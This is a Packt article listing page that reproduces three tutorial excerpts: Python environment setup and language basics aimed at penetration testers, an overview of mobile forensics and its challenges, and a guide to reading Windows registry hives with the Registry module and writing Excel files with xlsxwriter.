Python Scripting Essentials

Packt
17 May 2016
15 min read
In this article by Rejah Rehim, author of the book Mastering Python Penetration Testing, we will cover: Setting up the scripting environment in different operating systems Installing third-party Python libraries Working with virtual environments Python language basics (For more resources related to this topic, see here.) Python is still the leading language in the world of penetration testing (pentesting) and information security. Python-based tools include all kinds oftools used for inputting massive amounts of random data to find errors and security loop holes, proxies, and even the exploit frameworks. If you are interested in tinkering with pentesting tasks, Python is the best language to learn because of its large number of reverse engineering and exploitation libraries. Over the years, Python has received numerous updates and upgrades. For example, Python 2 was released in 2000 and Python 3 in 2008. Unfortunately, Python 3 is not backward compatible; hence most of the programs written in Python 2 will not work in Python 3. Even though Python 3 was released in 2008, most of the libraries and programs still use Python 2. To do better penetration testing, the tester should be able to read, write, and rewrite python scripts. As a scripting language, security experts have preferred Python as a language to develop security toolkits. Its human-readable code, modular design, and large number of libraries provide a start for security experts and researchers to create sophisticated toolswith it. Python comes with a vast library (standard library) that accommodates almost everything from simple I/O to platform-specific APIcalls. Many of the default and user-contributed libraries and modules can help us in penetration testing with building tools to achieve interesting tasks. Setting up the scripting environment Your scripting environment is basically the computer you use for your daily workcombined with all the tools in it that you use to write and run Python programs. The best system to learn on is the one you are using right now. This section will help you to configure the Python scripting environment on your computer so that you can create and run your own programs. If you are using Mac OS X or Linux installation in your computer, you may have a Python Interpreter pre-installed in it. To find out if you have one, open terminal and type python. You will probably see something like this: $ python Python 2.7.6 (default, Mar 22 2014, 22:59:56) [GCC 4.8.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> From the preceding output, we can see that Python 2.7.6 is installed in this system. By issuing python in your terminal, you started Python interpreter in the interactive mode. Here, you can play around with Python commands; what you type will run and you'll see the outputs immediately. You can use your favorite text editor to write your Python programs. If you do not have one, then try installing Geany or Sublime Text and it should be perfect for you. These are simple editors and offer a straightforward way to write as well as run your Python programs. In Geany, the output is shown in a separate terminal window, whereas Sublime Text uses an embedded terminal window. Sublime Text is not free, but it has a flexible trial policy that allows you to use the editor without any stricture. It is one of the few cross-platform text editors that is quite apt for beginners and has a full range of functions targeting professionals. Setting up in Linux Linux system is built in a way that makes it smooth for users to get started with Python programming. Most Linux distributions already have Python installed. For example, the latest versions of Ubuntu and Fedora come with Python 2.7. Also, the latest versions of Redhat Enterprise (RHEL) and CentOS come with Python 2.6. Just for the records, you might want to check it. If it is not installed, the easiest way to install Python is to use the default package manger of your distribution, such as apt-get, yum, and so on. Install Python by issuing the following commands in the terminal. For Debian / Ubuntu Linux / Kali Linux users: sudo apt-get install python2 For Red Hat / RHEL / CentOS Linux user sudo yum install python To install Geany, leverage your distribution'spackage manger. For Debian / Ubuntu Linux / Kali Linux users: sudo apt-get install geany geany-common For Red Hat / RHEL / CentOS Linux users: sudo yum install geany Setting up in Mac Even though Macintosh is a good platform to learn Python, many people using Macs actually run some Linux distribution or the other on their computer or run Python within a virtual Linux machine. The latest version of Mac OS X, Yosemite, comes with Python 2.7 preinstalled. Once you verify that it is working, install Sublime Text. For Python to run on your Mac, you have to install GCC, which can be obtained by downloading XCode, the smaller command-line tool. Also, we need to install Homebrew, a package manager. To install Homebrew, open Terminal and run the following: $ ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" After installing Homebrew, you have to insert the Homebrew directory into your PATH environment variable. You can do this by including the following line in your ~/.profile file: export PATH=/usr/local/bin:/usr/local/sbin:$PATH Now that we are ready to install Python 2.7, run the following command in your terminal that will do the rest: $ brew install python To install Sublime Text, go to Sublime Text's downloads page in http://www.sublimetext.com/3 and click on the OS X link. This will get you the Sublime Text installer for your Mac. Setting up in Windows Windows does not have Python preinstalled on it. To check whether it isinstalled, open a command prompt and type the word python, and press Enter. In most cases, you will get a message that says Windows does not recognize python as a command. We have to download an installer that will set Python for Windows. Then, we have to install and configure Geany to run Python programs. Go to Python's download page in https://www.python.org/downloads/windows/and download the Python 2.7 installer, which is compatible with your system. If you are not aware of your operating systems architecture, then download 32-bit installers, which will work on both the architectures, but 64-bit will only work on 64-bit systems. To install Geany, go to Geany'sdownload page viahttp://www.geany.org/Download/Releases and download the full installer variant, which has a description Full Installer including GTK 2.16. By default, Geany doesn't know where Python resides on your system. So, we need to configure it manually. For this, write a Hello world program in Geany, save it anywhere in your system as hello.py, and run it. There are three methods you can run a python program in Geany: Select Build | Execute. Press F5. Click the icon with three gears on it: When you have a running hello.py program in Geany, go to Build | Set Build Commands. Then, enter the python commands option withC:Python27python -m py_compile "%f"and execute command withC:Python27python "%f". Now, you can run your Python programs while coding in Geany. It is recommended to run a Kali Linux distribution as a virtual machine and use this as your scripting environment. Kali Linux comes with a number of tools preinstalled and is based on Debian Linux, so you'll also be able to install a wide variety of additional tools and libraries. Also, some of the libraries will not work properly on Windows systems. Installing third-party libraries We will be using many Python libraries and this section will help you install and use third-party libraries. Setuptools and pip One of the most useful pieces of third-party Python software is Setuptools. With Setuptools, you could download and install any compliant Python libraries with a single command. The best way to install Setuptools on any system is to download the ez_setup.py file from https://bootstrap.pypa.io/ez_setup.pyand run this file with your Python installation. In Linux, run this in terminal with the correct path to theez_setup.py script: sudo python path/to/ez_setup.py For Windows 8 or the older versions of Windows with PowerShell 3 installed, start Powershell with Administrative privileges and run this command in it: > (Invoke-WebRequest https://bootstrap.pypa.io/ez_setup.py).Content | python - For Windows systems without a PowerShell 3 installed, download the ez_setup.py file from the link provided previously using your web browser and run that file with your Python installation. pipis a package management system used to install and manage software packages written in Python.After the successful installation of Setuptools, you can install pip by simply opening a command prompt and running the following: $ easy_install pip Alternatively, you could also install pip using your default distribution package managers: On Debian, Ubuntu and Kali Linux: sudo apt-get install python-pip On Fedora: sudo yum install python-pip Now, you could run pip from the command line. Try installing a package with pip: $ pip install packagename Working with virtual environments Virtual environment helps separate dependencies required for different projects; by working inside the virtual environment, it also helps to keep our global site-packages directory clean. Using virtualenv and virtualwrapper virtualenv is a python module which helps to create isolated Python environments for our each scripting experiments, which creates a folder with all necessary executable files and modules for a basic python project. You can install virtual virtualenv with the following command: sudo pip install virtualenv To create a new virtual environment,create a folder and enter into the folder from commandline: $ cd your_new_folder $ virtualenv name-of-virtual-environment This will initiate a folder with the provided name in your current working directory with all the Python executable files and pip library, which will then help install other packages in your virtual environment. You can select a Python interpreter of your choice by providing more parameters, such as the following command: $ virtualenv -p /usr/bin/python2.7 name-of-virtual-environment This will create a virtual environment with Python 2.7 .We have to activate it before we start using this virtual environment: $ source name-of-virtual-environment/bin/activate Now, on the left-hand side of the command prompt, the name of the active virtual environment will appear. Any package that you install inside this prompt using pip will belong to the active virtual environment, which will be isolated from all the other virtual environments and global installation. You can deactivate and exit from the current virtual environment using this command: $ deactivate virtualenvwrapper provides a better way to use virtualenv. It also organize all the virtual environments in one place. To install, we can use pip, but let's make sure we have installed virtualenv before installing virtualwrapper. Linux and OS X users can install it with the following method: $ pip install virtualenvwrapper Also,add thesethree lines inyour shell startup file like .bashrc or .profile. export WORKON_HOME=$HOME/.virtualenvs export PROJECT_HOME=$HOME/Devel source /usr/local/bin/virtualenvwrapper.sh This will set theDevel folder in your home directory as the location of your virtual environment projects. For Windows users, we can use another package virtualenvwrapper-win . This can also be installed with pip. pip install virtualenvwrapper-win Create a virtual environment with virtualwrapper: $ mkvirtualenv your-project-name This creates a folder with the provided name inside ~/Envs. To activate this environment, we can use workon command: $ workon your-project-name These two commands can be combined with the single one,as follows: $ mkproject your-project-name We can deactivate the virtual environment with the same deactivate command in virtualenv. To delete a virtual environment, we can use the following command: $ rmvirtualenv your-project-name Python language essentials In this section, we will go through the idea of variables, strings, data types, networking, and exception handling. As an experienced programmer, this section will be just a summarization of what you already know about Python. Variables and types Python is brilliant in case of variables—variable point to data stored in a memory location. This memory location may contain different values, such as integer, real number, Booleans, strings, lists, and dictionaries. Python interprets and declares variables when you set some value to this variable. For example, if we set: a = 1 andb = 2 Then, we will print the sum of these two variables with: print (a+b) The result will be 3 as Python will figure out both a and b are numbers. However, if we had assigned: a = "1" and b = "2" Then,the output will be 12, since both a and b will be considered as strings. Here, we do not have to declare variables or their type before using them, as each variable is an object. The type() method can be used to getthe variable type. Strings As any other programming language, strings are one of the important things in Python. They are immutable. So, they cannot be changed once they are defined. There are many Python methods, which can modify string. They do nothing to the original one, but create a copy and return after modifications. Strings can be delimited with single quotes, double quotes, or in case of multiple lines, we can use triple quotes syntax. We can use the character to escape additional quotes, which come inside a string. Commonly used string methods are: string.count('x'):This returns the number of occurrences of 'x' in the string string.find('x'):This returns the position of character 'x'in the string string.lower():This converts the string into lowercase string.upper():This converts the string into uppercase string.replace('a', 'b'):This replaces alla with b in the string Also, we can get the number of characters including white spaces in a string with the len() method. #!/usr/bin/python a = "Python" b = "Pythonn" c = "Python" print len(a) print len(b) print len(c) You can read more about the string function via https://docs.python.org/2/library/string.html. Lists Lists allow to store more than one variable inside it and provide a better method for sorting arrays of objects in Python. They also have methods that will help to manipulate the values inside them. list = [1,2,3,4,5,6,7,8] print (list[1]) This will print 2, as the Python index starts from 0. Print out the whole list: list = [1,2,3,4,5,6,7,8] for x in list: print (x) This will loop through all the elements and print them. Useful list methods are: .append(value):This appends an element at the end of list .count('x'):This gets the the number of 'x' in list .index('x'):This returns the index of 'x' in list .insert('y','x'):This inserts 'x' at location 'y' .pop():This returns last element and also remove it from list .remove('x'):This removes first 'x' from list .reverse():This reverses the elements in the list .sort():This sorts the list alphabetically in ascending order, or numerical in ascending order Dictionaries A Python dictionary is a storage method for key:value pairs. In Python, dictionaries are enclosed in curly braces, {}. For example, dictionary = {'item1': 10, 'item2': 20} print(dictionary['item2']) This will output 20. We cannot create multiple values with the same key. This will overwrite the previous value of the duplicate keys. Operations on dictionaries are unique. Slicing is not supported in dictionaries We can combine two distinct dictionaries to one by using the update method. Also, the update method will merge existing elements if they conflict: a = {'apples': 1, 'mango': 2, 'orange': 3} b = {'orange': 4, 'lemons': 2, 'grapes ': 4} a.update(b) Print a This will return: {'mango': 2, 'apples': 1, 'lemons': 2, 'grapes ': 4, 'orange': 4} To delete elements from a dictionary, we can use the del method: del a['mango'] print a This will return: {'apples': 1, 'lemons': 2, 'grapes ': 4, 'orange': 4} Networking Sockets are the basic blocks behind all the network communications by a computer. All network communications go through a socket. So, sockets are the virtual endpoints of any communication channel that takes place between two applications, which may reside on the same or different computers. The socket module in Python provides us a better way to create network connections with Python. So, to make use of this module, we will have to import this in our script: import socket socket.setdefaulttimeout(3) newSocket = socket.socket() newSocket.connect(("localhost",22)) response = newSocket.recv(1024) print response This script will get the response header from the server. Handling Exceptions Even though we wrote syntactically correct scripts, there will be some errors while executing them. So, we will have to handle the errors properly. The simplest way to handle exception in Python is try-except: Try to divide a number with zero in your Python interpreter: >>> 10/0 Traceback (most recent call last): File "<stdin>", line 1, in <module> ZeroDivisionError: integer division or modulo by zero So, we can rewrite this script with thetry-except blocks: try: answer = 10/0 except ZeroDivisionError, e: answer = e print answer This will return the error integer division or modulo by zero. Summary Now, we have an idea about basic installations and configurations that we have to do before coding. Also, we have gone through the basics of Python, which may help us speed up scripting. Resources for Article:   Further resources on this subject: Exception Handling in MySQL for Python [article] An Introduction to Python Lists and Dictionaries [article] Python LDAP applications - extra LDAP operations and the LDAP URL library [article]
Read more
  • 0
  • 0
  • 14812
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-mobile-forensics-and-its-challanges
Packt
25 Apr 2016
10 min read
Save for later

Mobile Forensics and Its Challanges

Packt
25 Apr 2016
10 min read
In this article by Heather Mahalik and Rohit Tamma, authors of the book Practical Mobile Forensics, Second Edition, we will cover the following topics: Introduction to mobile forensics Challenges in mobile forensics (For more resources related to this topic, see here.) Why do we need mobile forensics? In 2015, there were more than 7 billion mobile cellular subscriptions worldwide, up from less than 1 billion in 2000, says International Telecommunication Union (ITU). The world is witnessing technology and user migration from desktops to mobile phones. The following figure sourced from statista.com shows the actual and estimated growth of smartphones from the year 2009 to 2018. Growth of smartphones from 2009 to 2018 in million units Gartner Inc. reports that global mobile data traffic reached 52 million terabytes (TB) in 2015, an increase of 59 percent from 2014, and the rapid growth is set to continue through 2018, when mobile data levels are estimated to reach 173 million TB. Smartphones of today, such as the Apple iPhone, Samsung Galaxy series, and BlackBerry phones, are compact forms of computers with high performance, huge storage, and enhanced functionalities. Mobile phones are the most personal electronic device that a user accesses. They are used to perform simple communication tasks, such as calling and texting, while still providing support for Internet browsing, e-mail, taking photos and videos, creating and storing documents, identifying locations with GPS services, and managing business tasks. As new features and applications are incorporated into mobile phones, the amount of information stored on the devices is continuously growing. Mobiles phones become portable data carriers, and they keep track of all your moves. With the increasing prevalence of mobile phones in peoples' daily lives and in crime, data acquired from phones become an invaluable source of evidence for investigations relating to criminal, civil, and even high-profile cases. It is rare to conduct a digital forensic investigation that does not include a phone. Mobile device call logs and GPS data were used to help solve the attempted bombing in Times Square, New York, in 2010. The details of the case can be found at http://www.forensicon.com/forensics-blotter/cell-phone-email-forensics-investigation-cracks-nyc-times-square-car-bombing-case/. The science behind recovering digital evidence from mobile phones is called mobile forensics. Digital evidence is defined as information and data that is stored on, received, or transmitted by an electronic device that is used for investigations. Digital evidence encompasses any and all digital data that can be used as evidence in a case. Mobile forensics Digital forensics is a branch of forensic science focusing on the recovery and investigation of raw data residing in electronic or digital devices. The goal of the process is to extract and recover any information from a digital device without altering the data present on the device. Over the years, digital forensics grew along with the rapid growth of computers and various other digital devices. There are various branches of digital forensics based on the type of digital device involved such as computer forensics, network forensics, mobile forensics, and so on. Mobile forensics is a branch of digital forensics related to the recovery of digital evidence from mobile devices. Forensically sound is a term used extensively in the digital forensics community to qualify and justify the use of particular forensic technology or methodology. The main principle for a sound forensic examination of digital evidence is that the original evidence must not be modified. This is extremely difficult with mobile devices. Some forensic tools require a communication vector with the mobile device, thus a standard write protection will not work during forensic acquisition. Other forensic acquisition methods may involve removing a chip or installing a bootloader on the mobile device prior to extract data for forensic examination. In cases where the examination or data acquisition is not possible without changing the configuration of the device, the procedure and the changes must be tested, validated, and documented. Following proper methodology and guidelines is crucial in examining mobile devices as it yields the most valuable data. As with any evidence gathering, not following the proper procedure during the examination can result in loss or damage of evidence or render it inadmissible in court. The mobile forensics process is broken into three main categories: seizure, acquisition, and examination/analysis. Forensic examiners face some challenges while seizing the mobile device as a source of evidence. At the crime scene, if the mobile device is found switched off, the examiner should place the device in a faraday bag to prevent changes should the device automatically power on. As shown in the following figure, Faraday bags are specifically designed to isolate the phone from the network. A Faraday bag (Image courtesy: http://www.amazon.com/Black-Hole-Faraday-Bag-Isolation/dp/B0091WILY0) If the phone is found switched on, switching it off has a lot of concerns attached to it. If the phone is locked by a PIN or password or encrypted, the examiner will be required to bypass the lock or determine the PIN to access the device. Mobile phones are networked devices and can send and receive data through different sources, such as telecommunication systems, Wi-Fi access points, and Bluetooth. So, if the phone is in a running state, a criminal can securely erase the data stored on the phone by executing a remote wipe command. When a phone is switched on, it should be placed in a faraday bag. If possible, prior to placing the mobile device in the faraday bag, disconnect it from the network to protect the evidence by enabling the flight mode and disabling all network connections (Wi-Fi, GPS, Hotspots, and so on). This will also preserve the battery, which will drain while in a faraday bag and protect against leaks in the faraday bag. Once the mobile device is seized properly, the examiner may need several forensic tools to acquire and analyze the data stored on the phone. Mobile phones are dynamic systems that present a lot of challenges to the examiner in extracting and analyzing digital evidence. The rapid increase in the number of different kinds of mobile phones from different manufacturers makes it difficult to develop a single process or tool to examine all types of devices. Mobile phones are continuously evolving as existing technologies progress and new technologies are introduced. Furthermore, each mobile is designed with a variety of embedded operating systems. Hence, special knowledge and skills are required from forensic experts to acquire and analyze the devices. Challenges in mobile forensics One of the biggest forensic challenges when it comes to the mobile platform is the fact that data can be accessed, stored, and synchronized across multiple devices. As the data is volatile and can be quickly transformed or deleted remotely, more effort is required for the preservation of this data. Mobile forensics is different from computer forensics and presents unique challenges to forensic examiners. Law enforcement and forensic examiners often struggle to obtain digital evidence from mobile devices. The following are some of the reasons: Hardware differences: The market is flooded with different models of mobile phones from different manufacturers. Forensic examiners may come across different types of mobile models, which differ in size, hardware, features, and operating system. Also, with a short product development cycle, new models emerge very frequently. As the mobile landscape is changing each passing day, it is critical for the examiner to adapt to all the challenges and remain updated on mobile device forensic techniques across various devices. Mobile operating systems: Unlike personal computers where Windows has dominated the market for years, mobile devices widely use more operating systems, including Apple's iOS, Google's Android, RIM's BlackBerry OS, Microsoft's Windows Mobile, HP's webOS, Nokia's Symbian OS, and many others. Even within these operating systems, there are several versions which make the task of forensic investigator even more difficult. Mobile platform security features: Modern mobile platforms contain built-in security features to protect user data and privacy. These features act as a hurdle during the forensic acquisition and examination. For example, modern mobile devices come with default encryption mechanisms from the hardware layer to the software layer. The examiner might need to break through these encryption mechanisms to extract data from the devices. Lack of resources: As mentioned earlier, with the growing number of mobile phones, the tools required by a forensic examiner would also increase. Forensic acquisition accessories, such as USB cables, batteries, and chargers for different mobile phones, have to be maintained in order to acquire those devices. Preventing data modification: One of the fundamental rules in forensics is to make sure that data on the device is not modified. In other words, any attempt to extract data from the device should not alter the data present on that device. But this is practically not possible with mobiles because just switching on a device can change the data on that device. Even if a device appears to be in an off state, background processes may still run. For example, in most mobiles, the alarm clock still works even when the phone is switched off. A sudden transition from one state to another may result in the loss or modification of data. Anti-forensic techniques: Anti-forensic techniques, such as data hiding, data obfuscation, data forgery, and secure wiping, make investigations on digital media more difficult. Dynamic nature of evidence: Digital evidence may be easily altered either intentionally or unintentionally. For example, browsing an application on the phone might alter the data stored by that application on the device. Accidental reset: Mobile phones provide features to reset everything. Resetting the device accidentally while examining may result in the loss of data. Device alteration: The possible ways to alter devices may range from moving application data, renaming files, and modifying the manufacturer's operating system. In this case, the expertise of the suspect should be taken into account. Passcode recovery: If the device is protected with a passcode, the forensic examiner needs to gain access to the device without damaging the data on the device. While there are techniques to bypass the screen lock, they may not work always on all the versions. Communication shielding: Mobile devices communicate over cellular networks, Wi-Fi networks, Bluetooth, and Infrared. As device communication might alter the device data, the possibility of further communication should be eliminated after seizing the device. Lack of availability of tools: There is a wide range of mobile devices. A single tool may not support all the devices or perform all the necessary functions, so a combination of tools needs to be used. Choosing the right tool for a particular phone might be difficult. Malicious programs: The device might contain malicious software or malware, such as a virus or a Trojan. Such malicious programs may attempt to spread over other devices over either a wired interface or a wireless one. Legal issues: Mobile devices might be involved in crimes, which can cross geographical boundaries. In order to tackle these multijurisdictional issues, the forensic examiner should be aware of the nature of the crime and the regional laws. Summary Mobile devices store a wide range of information such as SMS, call logs, browser history, chat messages, location details, and so on. Mobile device forensics includes many approaches and concepts that fall outside of the boundaries of traditional digital forensics. Extreme care should be taken while handling the device right from evidence intake phase to archiving phase. Examiners responsible for mobile devices must understand the different acquisition methods and the complexities of handling the data during analysis. Extracting data from a mobile device is half the battle. The operating system, security features, and type of smartphone will determine the amount of access you have to the data. It is important to follow sound forensic practices and make sure that the evidence is unaltered during the investigation. Resources for Article: Further resources on this subject: Forensics Recovery [article] Mobile Phone Forensics – A First Step into Android Forensics [article] Mobility [article]
Read more
  • 0
  • 0
  • 18211

article-image-using-registry-and-xlswriter-modules
Packt
14 Apr 2016
12 min read
Save for later

Using the Registry and xlswriter modules

Packt
14 Apr 2016
12 min read
In this article by Chapin Bryce and Preston Miller, the authors of Learning Python for Forensics, we will learn about the features offered by the Registry and xlswriter modules. (For more resources related to this topic, see here.) Working with the Registry module The Registry module, developed by Willi Ballenthin, can be used to obtain keys and values from registry hives. Python provides a built-in registry module called _winreg; however, this module only works on Windows machines. The _winreg module interacts with the registry on the system running the module. It does not support opening external registry hives. The Registry module allows us to interact with the supplied registry hives and can be run on non-Windows machines. The Registry module can be downloaded from https://github.com/williballenthin/python-registry. Click on the releases section to see a list of all the stable versions and download the latest version. For this article, we use version 1.1.0. Once the archived file is downloaded and extracted, we can run the included setup.py file to install the module. In a command prompt, execute the following code in the module's top-level directory as shown: python setup.py install This should install the Registry module successfully on your machine. We can confirm this by opening the Python interactive prompt and typing import Registry. We will receive an error if the module is not installed successfully. With the Registry module installed, let's begin to learn how we can leverage this module for our needs. First, we need to import the Registry class from the Registry module. Then, we use the Registry function to open the registry object that we want to query. Next, we use the open() method to navigate to our key of interest. In this case, we are interested in the RecentDocs registry key. This key contains recent active files separated by extension as shown: >>> from Registry import Registry >>> reg = Registry.Registry('NTUSER.DAT') >>> recent_docs = reg.open('SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs') If we print therecent_docs variable, we can see that it contains 11 values with five subkeys, which may contain additional values and subkeys. Additionally, we can use thetimestamp() method to see the last written time of the registry key. >>> print recent_docs Registry Key CMI-CreateHive{B01E557D-7818-4BA7-9885-E6592398B44E}SoftwareMicrosoftWindowsCurrentVersionExplorerRecentDocs with 11 values and 5 subkeys >>> print recent_docs.timestamp() # Last Written Time 2012-04-23 09:34:12.099998 We can iterate over the values in the recent_docs key using the values() function in a for loop. For each value, we can access the name(), value(), raw_data(), value_type(), and value_type_str() methods. The value() and raw_data() represent the data in different ways. We will use the raw_data() function when we want to work with the underlying binary data and use the value() function to gather an interpreted result. The value_type() and value_type_str() functions display a number or string that identify the type of data, such as REG_BINARY, REG_DWORD, REG_SZ, and so on. >>> for i, value in enumerate(recent_docs.values()): ... print '{}) {}: {}'.format(i, value.name(), value.value()) ... 0) MRUListEx: ???? 1) 0: myDocument.docx 2) 4: oldArchive.zip 3) 2: Salaries.xlsx ... Another useful feature of the Registry module is the means provided for querying for a certain subkey or value. This is provided by the subkey(), value(), or find_key() functions. A RegistryKeyNotFoundException is generated when a subkey is not present while using the subkey() function: >>> if recent_docs.subkey('.docx'): ... print 'Found docx subkey.' ... Found docx subkey. >>> if recent_docs.subkey('.1234abcd'): ... print 'Found 1234abcd subkey.' ... Registry.Registry.RegistryKeyNotFoundException: ... The find_key() function takes a path and can find a subkey through multiple levels. The subkey() and value() functions only search child elements. We can use these functions to confirm that a key or value exists before trying to navigate to them. If a particular key or value cannot be found, a custom exception from the Registry module is raised. Be sure to add error handling to catch this error and also alert the user that the key was not discovered. With the Registry module, finding keys and their values becomes straightforward. However, when the values are not strings and are instead binary data we have to rely on another module to make sense of the mess. For all binary needs, the struct module is an excellent candidate. Read also: Tools for Working with Excel and Python Creating Spreadsheets with the xlsxwriter Module Xlsxwriter is a useful third-party module that writes Excel output. There are a plethora of Excel-supported modules for Python, but we chose this module because it was highly robust and well-documented. As the name suggests, this module can only be used to write Excel spreadsheets. The xlsxwriter module supports cell and conditional formatting, charts, tables, filters, and macros among others. Adding data to a spreadsheet Let's quickly create a script called simplexlsx.v1.py for this example. On lines 1 and 2 we import the xlsxwriter and datetime modules. The data we are going to be plotting, including the header column is stored as nested lists in the school_data variable. Each list is a row of information that we want to store in the output excel sheet, with the first element containing the column names. 001 import xlsxwriter 002 from datetime import datetime 003 004 school_data = [['Department', 'Students', 'Cumulative GPA', 'Final Date'], 005 ['Computer Science', 235, 3.44, datetime(2015, 07, 23, 18, 00, 00)], 006 ['Chemistry', 201, 3.26, datetime(2015, 07, 25, 9, 30, 00)], 007 ['Forensics', 99, 3.8, datetime(2015, 07, 23, 9, 30, 00)], 008 ['Astronomy', 115, 3.21, datetime(2015, 07, 19, 15, 30, 00)]] The writeXLSX() function, defined on line 11, is responsible for writing our data in to a spreadsheet. First, we must create our Excel spreadsheet using the Workbook() function supplying the desired name of the file. On line 13, we create a worksheet using the add_worksheet() function. This function can take the desired title of the worksheet or use the default name 'Sheet N', where N is the specific sheet number. 011 def writeXLSX(data): 012 workbook = xlsxwriter.Workbook('MyWorkbook.xlsx') 013 main_sheet = workbook.add_worksheet('MySheet') The date_format variable stores a custom number format that we will use to display our datetime objects in the desired format. On line 17, we begin to enumerate through our data to write. The conditional on line 18 is used to handle the header column which is the first list encountered. We use the write() function and supply a numerical row and column. Alternatively, we can also use the Excel notation, i.e. A1. 015 date_format = workbook.add_format({'num_format': 'mm/dd/yy hh:mm:ss AM/PM'}) 016 017 for i, entry in enumerate(data): 018 if i == 0: 019 main_sheet.write(i, 0, entry[0]) 020 main_sheet.write(i, 1, entry[1]) 021 main_sheet.write(i, 2, entry[2]) 022 main_sheet.write(i, 3, entry[3]) The write() method will try to write the appropriate type for an object when it can detect the type. However, we can use different write methods to specify the correct format. These specialized writers preserve the data type in Excel so that we can use the appropriate data type specific Excel functions for the object. Since we know the data types within the entry list, we can manually specify when to use the general write() function or the specific write_number() function. 023 else: 024 main_sheet.write(i, 0, entry[0]) 025 main_sheet.write_number(i, 1, entry[1]) 026 main_sheet.write_number(i, 2, entry[2]) For the fourth entry in the list, thedatetime object, we supply the write_datetime() function with our date_format defined on line 15. After our data is written to the workbook, we use the close() function to close and save our data. On line 32, we call the writeXLSX() function passing it to the school_data list we built earlier. 027 main_sheet.write_datetime(i, 3, entry[3], date_format) 028 029 workbook.close() 030 031 032 writeXLSX(school_data) A table of write functions and the objects they preserve is presented below. Function Supported Objects write_string str write_number int, float, long write_datetime datetime objects write_boolean bool write_url str When the script is invoked at the Command Line, a spreadsheet called MyWorkbook.xlsx is created. When we convert this to a table, we can sort it according to any of our values. Had we failed to preserve the data types values such as our dates might be identified as non-number types and prevent us from sorting them appropriately. Building a table Being able to write data to an Excel file and preserve the object type is a step-up over CSV, but we can do better. Often, the first thing an examiner will do with an Excel spreadsheet is convert the data into a table and begin the frenzy of sorting and filtering. We can convert our data range to a table. In fact, writing a table with xlsxwriter is arguably easier than writing each row individually. The following code will be saved into the file simplexlsx.v2.py. For this iteration, we have removed the initial list in the school_data variable that contained the header information. Our new writeXLSX() function writes the header separately. 004 school_data = [['Computer Science', 235, 3.44, datetime(2015, 07, 23, 18, 00, 00)], 005 ['Chemistry', 201, 3.26, datetime(2015, 07, 25, 9, 30, 00)], 006 ['Forensics', 99, 3.8, datetime(2015, 07, 23, 9, 30, 00)], 007 ['Astronomy', 115, 3.21, datetime(2015, 07, 19, 15, 30, 00)]] Lines 10 through 14 are identical to the previous iteration of the function. Representing our table on the spreadsheet is accomplished on line 16. 010 def writeXLSX(data): 011 workbook = xlsxwriter.Workbook('MyWorkbook.xlsx') 012 main_sheet = workbook.add_worksheet('MySheet') 013 014 date_format = workbook.add_format({'num_format': 'mm/dd/yy hh:mm:ss AM/PM'}) The add_table() function takes multiple arguments. First, we pass a string representing the top-left and bottom-right cells of the table in Excel notation. We use the length variable, defined on line 15, to calculate the necessary length of our table. The second argument is a little more confusing; this is a dictionary with two keys, named data and columns. The data key has a value of our data variable, which is perhaps poorly named in this case. The columns key defines each row header and, optionally, its format, as seen on line 19: 015 length = str(len(data) + 1) 016 main_sheet.add_table(('A1:D' + length), {'data': data, 017 'columns': [{'header': 'Department'}, {'header': 'Students'}, 018 {'header': 'Cumulative GPA'}, 019 {'header': 'Final Date', 'format': date_format}]}) 020 workbook.close() In lesser lines than the previous example, we've managed to create a more useful output built as a table. Now our spreadsheet has our specified data already converted into a table and ready to be sorted. There are more possible keys and values that can be supplied during the construction of a table. Please consult the documentation at (http://xlsxwriter.readthedocs.org) for more details on advanced usage. This process is simple when we are working with nested lists representing each row of a worksheet. Data structures not in the specified format require a combination of both methods demonstrated in our previous iterations to achieve the same effect. For example, we can define a table to span across a certain number of rows and columns and then use the write() function for those cells. However, to prevent unnecessary headaches we recommend keeping data in nested lists. Creating charts with Python Lastly, let's create a chart with xlsxwriter. The module supports a variety of different chart types including: line, scatter, bar, column, pie, and area. We use charts to summarize the data in meaningful ways. This is particularly useful when working with large data sets, allowing examiners to gain a high level of understanding of the data before getting into the weeds. Let's modify the previous iteration yet again to display a chart. We will save this modified file as simplexlsx.v3.py. On line 21, we are going to create a variable called department_grades. This variable will be our chart object created by the add_chart()method. For this method, we pass in a dictionary specifying keys and values[SS4] . In this case, we specify the type of the chart to be a column chart. 021 department_grades = workbook.add_chart({'type':'column'}) On line 22, we use theset_title() function and again pass it in a dictionary of parameters. We set the name key equal to our desired title. At this point, we need to tell the chart what data to plot. We do this with the add_series() function. Each category key maps to the Excel notation specifying the horizontal axis data. The vertical axis is represented by the values key. With the data to plot specified, we use theinsert_chart() function to plot the data in the spreadsheet. We give this function a string of the cell to plot the top-left of the chart and then the chart object itself. 022 department_grades.set_title({'name':'Department and Grade distribution'}) 023 department_grades.add_series({'categories':'=MySheet!$A$2:$A$5', 'values':'=MySheet!$C$2:$C$5'}) 024 main_sheet.insert_chart('A8', department_grades) 025 workbook.close() Running this version of the script will convert our data into a table and generate a column chart comparing departments by their grades. We can clearly see that, unsurprisingly, the Forensic Science department has the highest GPA earners in the school's program. This information is easy enough to eyeball for such a small data set. However, when working with data orders of larger magnitude, creating summarizing graphics can be particularly useful to understand the big picture. Be aware that there is a great deal of additional functionality in the xlsxwriter module that we will not use in our script. This is an extremely powerful module and we recommend it for any operation that requires writing Excel spreadsheets. Summary In this article, we began with introducing the Registry module and how it is used to obtain keys and values from registry hives. Next, we dealt with various aspects of spreadsheets, such as cells, tables, and charts using the xlswriter module. Resources for Article: Further resources on this subject: Test all the things with Python [article] An Introduction to Python Lists and Dictionaries [article] Python Data Science Up and Running [article]
Read more
  • 0
  • 0
  • 4850

article-image-selecting-and-analyzing-digital-evidence
Packt
08 Apr 2016
13 min read
Save for later

Selecting and Analyzing Digital Evidence

Packt
08 Apr 2016
13 min read
